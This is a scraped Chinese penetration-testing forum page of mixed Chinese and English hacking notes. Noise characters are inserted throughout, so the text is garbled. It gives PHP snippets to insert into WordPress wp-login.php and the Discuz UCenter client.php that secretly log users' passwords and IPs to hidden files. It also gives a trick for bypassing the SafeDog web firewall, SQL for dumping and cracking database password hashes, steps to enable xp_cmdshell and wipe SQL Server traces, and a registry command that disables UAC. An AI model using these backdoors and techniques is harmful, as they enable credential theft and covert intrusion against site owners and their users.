$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
, R# a8 ^3 \& i, Y( ~# s' R: M: Y- a6 Y$txt=$txt.”\r\n”;
. d* i' E- P7 x( _. Rif($log_user&&$log_pwd&&$log_ip){
& ^! ?$ R  x5 F6 |7 n1 c3 s@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# Y$ ~' P3 D0 |1 {8 N/ V7 T
}' W) C. E( G# V$ {1 n
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。: Z& s  |  H; Y4 i
就是搜索case ‘login’* ]) j1 p7 O5 h
在它下面直接插入即可,记录的密码生成在pwd.txt中,
" S" }9 ]. }# Y0 w" ^& V6 G其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
1 ^) c' ^. r( I1 G: |利用II6文件解析漏洞绕过安全狗代码:5 ^0 A! r0 S( v, ^  K
;antian365.asp;antian365.jpg
# e1 c% }* p: P2 T* a
/ r7 }3 m; P9 F! o各种类型数据库抓HASH破解最高权限密码!& S4 c( k3 d7 B" n$ x" z$ c
1.sql server2000& X3 S9 C& I* A5 B7 w; h
SELECT password from master.dbo.sysxlogins where name='sa'' s# L, h# Z2 y& I. x" n
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, n# A2 r8 A" T7 T) M
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
- g  _4 Y. R) ]
! q5 Y, o4 ^3 r6 E5 @' V3 {6 a0×0100- constant header
, a1 t# R9 B. q, h7 f34767D5C- salt1 S/ P1 q" {$ w- x# ^+ }
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
% _- ~; j) ?6 l' F$ C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash) E' p6 K: n* E) T! T
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
9 W' I% J3 T8 Z, g( C. OSQL server 2005:-
( |6 n) n- P: P, k4 NSELECT password_hash FROM sys.sql_logins where name='sa'/ [; o! }+ B* t; {5 s7 B# c
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
4 U! t' V; B5 X4 \: d4 c0×0100- constant header/ Q. n  P# c* N0 c$ d; Z, Z
993BF231-salt
# Y: ~* J: o7 {* w5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
0 v1 ?( h: d$ Ycrack case sensitive hash in cain, try brute force and dictionary based attacks.
5 M8 e; }* W" [! l, V9 [1 E( k- F+ |
update:- following bernardo’s comments:-
: o& K+ ~& [1 @0 C( ]use function fn_varbintohexstr() to cast password in a hex string.
% U+ Q7 Z+ D% {2 Y9 F) D  Ye.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& U4 x8 @- Z! N' M5 t
. K$ J3 P6 v3 A6 [# ?' W3 hMYSQL:-+ y, W# r, G' p0 T3 k, T

2 R2 ~- I  R$ V! v& J& @! Q0 eIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.. v+ [' Z7 z$ K$ u2 e7 ]" p

; p- u. s' u( L* Q*mysql  < 4.1
" u# f8 ^4 J3 _3 p$ f; N; y
2 Y6 U( y0 m) }5 ~+ `( nmysql> SELECT PASSWORD(‘mypass’);  F- i! Y. s- h
+——————–+
6 k) i* f; ?5 f3 Q| PASSWORD(‘mypass’) |
" a) `- ]( U& N. z5 ~+——————–+
" I# n+ c( A0 f5 G| 6f8c114b58f2ce9e   |. u1 R: e  D) ?% z" Q# |8 L
+——————–+5 k$ V  ]6 N: H5 Q3 u  j) ^6 S

7 L( w" J6 O- j*mysql >=4.1- b  J$ Y9 r, G- p& D

( U5 i4 @6 W( U$ u, Kmysql> SELECT PASSWORD(‘mypass’);
; ^0 R9 t5 R' y  a6 l2 s+——————————————-+
& ~+ K& c9 ]* i4 {2 s. G5 a| PASSWORD(‘mypass’)                        |* l9 Q7 J* N! r$ h5 \+ C4 ]/ Y
+——————————————-+
0 q9 O* e1 c4 e, ?  H| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+ e) C6 `- S/ `3 e9 r, U+——————————————-+/ u( v! U1 }% L; f9 T/ s
3 }; _3 m' B& N+ D& v. h1 m
Select user, password from mysql.user
3 e5 U7 G4 Y# @2 C% W, Z4 ~The hashes can be cracked in ‘cain and abel’; _7 i! y9 D$ _% w7 u7 O

7 v; g% ?  T% i0 ~, MPostgres:-
! K. D6 N3 O$ m2 J4 n% J* L+ rPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
) Y3 Y6 }* y- H; w* vselect usename, passwd from pg_shadow;
3 y( {: d$ e( @5 v" ^2 Cusename      |  passwd
/ y( g) V7 z7 y4 H——————+————————————-
5 L1 B5 W& k5 ]. Ztestuser            | md5fabb6d7172aadfda4753bf0507ed4396! K- L) {/ x( P2 _! V& ]: u# i
use mdcrack to crack these hashes:-" u( B" @0 {+ L8 `* m/ `
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
* H" ?3 {- i% _& ^3 J4 w
* m9 l3 Z, \$ A# K/ P7 h: `6 z4 hOracle:-
( E* J! q4 z! z8 d2 r! g7 C" Qselect name, password, spare4 from sys.user$
, K1 B$ X/ g7 j# F4 {8 r4 m- U! |hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' M$ x; t2 O) I- u* I
More on Oracle later, i am a bit bored….
% p2 {& a7 u( j. B  \- D! S, V/ R- {( i% G1 A
! C. n2 O7 P; h( g0 m+ v" I+ p- b) M
在sql server2005/2008中开启xp_cmdshell
( W: y1 o5 Y+ J9 |* l-- To allow advanced options to be changed.
( u' @! W/ k# W4 h+ u) j5 Y( yEXEC sp_configure 'show advanced options', 1% E% @) R2 H) u" V. I
GO
7 u0 B) b$ |5 |( E-- To update the currently configured value for advanced options.
7 ~# q6 n" v: a- m, L# x, T# gRECONFIGURE8 O# W# {; k% @; J
GO% w3 |7 V7 {7 o& M. `
-- To enable the feature.
* A8 u2 u+ H* u. `" REXEC sp_configure 'xp_cmdshell', 1! e' Z! [, x! D! W4 a  m
GO8 P" b- w( o2 |* D; |$ _! o
-- To update the currently configured value for this feature.& Y: h/ E% s: I3 ~  }$ I! q" G
RECONFIGURE* e7 K1 l' v' h" F- P
GO" B5 i, e% @# I5 O0 d+ U: I
SQL 2008 server日志清除,在清楚前一定要备份。' c8 f: i4 e% V# q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:, o  _) s; g4 M, X( B$ u1 F' O
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
2 |$ p: ~0 j8 E2 `. }) K! [3 H! K0 x5 k7 K# R* s# [
对于SQL Server 2008以前的版本:
2 t% }  X" m& D+ L# W1 gSQL Server 2005:
9 g2 O6 s! y9 ^. h! y删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat* B3 a8 k' ?+ b8 ~6 x3 w+ N% @/ @
SQL Server 2000:, S- C! ~; V& h0 s/ d
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。: W$ C4 B0 j2 l1 o8 n8 E4 x; I

. T- S8 O0 [$ L6 d3 f5 _本帖最后由 simeon 于 2013-1-3 09:51 编辑
0 Z) l- Z1 T; ~6 C' w, @  A! B) i8 b$ B2 _, B

6 q+ A' I; w- s5 l1 p) zwindows 2008 文件权限修改
0 `6 b9 y7 V& _* k6 U$ R1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
- T( }! f5 t/ |& J2 B8 Z0 p2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
/ \/ g- C# `7 x$ A. ]一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,, C' W' ^- S! j  m
+ {' t& k( b8 ^9 L: V. b
Windows Registry Editor Version 5.00
( {: @5 ?5 p$ y( L[HKEY_CLASSES_ROOT\*\shell\runas]2 e6 n3 V9 ?4 ]$ ]& o/ s; f' C
@="管理员取得所有权"1 G% z& z. _7 {6 \) n- `
"NoWorkingDirectory"=""" {6 _6 z) w2 {- I. }0 j
[HKEY_CLASSES_ROOT\*\shell\runas\command]
3 Z, Z# r1 s3 q  q@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". `5 F' M: h. R. C
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" y- z8 s( k' v0 p, b$ {( I
[HKEY_CLASSES_ROOT\exefile\shell\runas2]4 ]2 k" A9 h* V! N+ v) m
@="管理员取得所有权"
+ w% D/ [9 k* _, a$ w) C1 y) l"NoWorkingDirectory"=""* t; {" w& B4 x( ~
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
* q8 D  K$ W5 ^@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": o4 z4 t/ T: A# w! |  o6 ?
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! \7 X2 s: y5 ?) e% _2 R

' d/ F9 S; a: X' B[HKEY_CLASSES_ROOT\Directory\shell\runas]
, ]9 _3 O) @4 B, a$ s# @" E+ Q0 e@="管理员取得所有权"
+ E+ K% O! a4 |( v"NoWorkingDirectory"=""
# m% f+ w/ W: ]  b( j9 p; j5 [* r[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
( q+ ]% d. x  v8 r@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
, I% R2 h5 o( x5 B3 P2 S"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
7 T8 a! A& Q- h+ q' a
' @) E/ R! E+ K. }5 d
  d+ Z6 P9 \& ^, a9 `8 Kwin7右键“管理员取得所有权”.reg导入
5 b0 P$ }4 R( A9 N: Y$ R二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
( d- U; n$ R0 Q- ?# \  x, S$ Y1 m0 `1、C:\Windows这个路径的“notepad.exe”不需要替换
+ Q) ]# [8 U0 Z+ q' Z! r9 `2、C:\Windows\System32这个路径的“notepad.exe”不需要替换; w" u. \, T' p* U, p8 a
3、四个“notepad.exe.mui”不要管" ?2 f  f4 y- P9 Y: B! u
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
  s" s' W, M: R3 B0 ?* K+ n& E4 GC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”1 |# C( T1 ]" `2 N/ |3 G1 V2 t
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! Y2 M4 d. |' W
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
* f# H0 L" e% V4 U+ |windows 2008中关闭安全策略:
2 }/ B  w" Y7 o5 W; ~reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% L7 H/ d$ z; |( s$ X2 x) S- N+ Q6 H修改uc_client目录下的client.php 在
) `# k1 [2 N' B2 O( M0 mfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, R0 G) S2 P& Q/ F) P2 q8 z: L下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
8 v8 `" r( K  T+ ^. }6 G你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
3 ?! Q, k- L3 y& r# w6 q3 |if(getenv('HTTP_CLIENT_IP')) {8 i( D9 ?- @  M
$onlineip = getenv('HTTP_CLIENT_IP');
& M- k+ X  Q. x} elseif(getenv('HTTP_X_FORWARDED_FOR')) {& a8 e' H3 E. w8 {5 m0 ]
$onlineip = getenv('HTTP_X_FORWARDED_FOR');& m6 I+ e) t* f8 E4 d
} elseif(getenv('REMOTE_ADDR')) {
3 |8 o  C9 |9 Z% D5 K5 \, l1 o( x$onlineip = getenv('REMOTE_ADDR');; F9 H$ _; E% P3 n( w9 R, A$ l
} else {" ?+ V6 B) J9 u2 }- B) P* X
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];+ ]" U$ A/ J$ @2 l* k; ?( n! E
}
( s/ z8 d0 n' M9 h* l     $showtime=date("Y-m-d H:i:s");; r; Q/ C0 |" z5 F0 }( L2 s
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";4 l+ h' y0 M1 R" m9 M
    $handle=fopen('./data/cache/csslog.php','a+');5 {( ]$ T( {+ q$ e; ^6 P' E3 B
    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2